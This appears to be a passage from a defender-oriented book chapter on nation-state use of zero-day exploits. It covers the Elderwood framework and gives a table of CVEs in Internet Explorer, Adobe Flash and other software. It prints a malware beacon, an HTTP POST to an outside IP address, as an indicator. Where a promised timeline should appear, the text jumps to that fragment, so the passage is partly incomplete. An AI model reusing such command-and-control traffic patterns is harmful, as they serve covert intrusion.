Due to the severity of zero-day exploits, they typically demand a high price on the open market. The cost of zero-day exploits is high for a few reasons. First, they are extremely difficult to find or identify. It will often require a great deal of time and money just to identify a viable zero-day exploit. Second, these exploits are not only attractive to criminals but also to nation-state attackers. Historically, the most dangerous and effective zero-day exploits appear in government-grade espionage attacks. For example, it was a number of zero-day exploits that allegedly allowed U.S. government hackers to infiltrate the SCADA systems and networks of Iran-based nuclear facilities in the mid to late 2000s. This breach made centrifuges spin much faster than normal, causing damage to the facility and slowing down Iran’s nuclear development.19
One of the interesting things about zero-day exploits is how nation-states employ them in their operations. Nation-state attackers use zero-day exploits more than any other attacker. Since the value and effectiveness of a zero-day exploit significantly decreases once defenders have discovered it, some adversaries have maximized the vulnerabilities’ usefulness by implementing systems to enhance their spread among various cyber units. Perhaps the best example of this phenomenon is targeted attacks allegedly conducted by China between 2010 and 2014; China developed a framework to distribute exploits among its cyberwarfare elements, causing the same exploits to appear in a number of well-documented public attacks.20 This zero-day distribution model has been named the Elderwood framework. There is likely much more to this framework than we can derive from publicly available information. Nevertheless, the Elderwood framework shows that several China-based groups have abnormally high levels of access to zero days, supporting the theory that these groups are affiliated with one another. Furthermore, this provides more evidence toward attribution claims that nation-states are funding these attacks.
Table 6-1 lists the zero days distributed between 2010 and 2014 among China-based espionage groups. Notice that the table’s left column lists an identifier for each vulnerability, called a CVE. Whenever defenders identify a vulnerability, they assign it a Common Vulnerabilities and Exposures (CVE) number that provides the software’s technical details. Included among these details is how attackers can exploit the vulnerability. This identifier can then help defenders find information such as what the vulnerability is, the timestamp of its discovery, and when a patch, if available, was released to remediate it.
Table 6-1: Elderwood Exploit List
CVE vulnerability | Program exploited |
2010-0249 | MS Internet Explorer |
2011-0609 | Adobe Flash |
2011-0611 | Adobe Flash |
2011-2110 | Adobe Flash |
2012-0779 | Adobe Flash |
2012-1535 | Adobe Flash |
2012-1875 | MS Internet Explorer |
2012-4792 | MS Internet Explorer |
2012-1889 | MS XML Core Services |
2013-0640 | Adobe Flash |
2013-3644 | Just Systems Ichitaro Word Processor |
2013-3893 | MS Internet Explorer |
2014-0322 | MS Internet Explorer |
The following timeline details prominent examples of how the attackers used these exploits, which group specifically used them, and the industries that the zero days impacted.21
POST /info.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Agtid: [8 chars]08x
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 180.150.228.102:443
Content-Length: 1045
Connection: Keep-Alive
Cache-Control: no-cache
This is the same adversary behind the Bit9 compromise in 2012 (reported in February 2013). This assessment is likely based off the reuse of the domain registration used in both this activity and the Bit9 compromise.
This list of zero days and the attackers behind them may seem repetitive—and it is. You might have noticed that, in some cases, the same zero-day exploits appeared among multiple groups within days or weeks of one another, all before a patch could protect victims. The probability that multiple attackers, originating from the same geographical location and engaging in espionage campaigns against similar industries, would all have access to the same zero-day exploit is slim.
As you’ve seen in this chapter, resourceful attackers constantly come up with new ways to exploit technologies and breach environments. Defenders need to understand how to investigate these types of attacks to protect against them successfully. Spear-phishing emails are the most common tactic used to gain the initial access into targeted environments, yet many defenders don’t understand how to analyze them and extract meaningful information. Now that you know the significant fields within the SMTP header, you can identify fraudulent emails.
Unfortunately, from time to time, attackers do breach the environments we are responsible for protecting. Covert communications are difficult to identify and often go undetected by automated defenses, making nation-state attackers who use these covert methods to deliver zero-day exploits a challenge for defenders. However, knowing how your adversary achieved these breaches in the past can help you conduct more effective threat hunting operations and better protect against them in the future.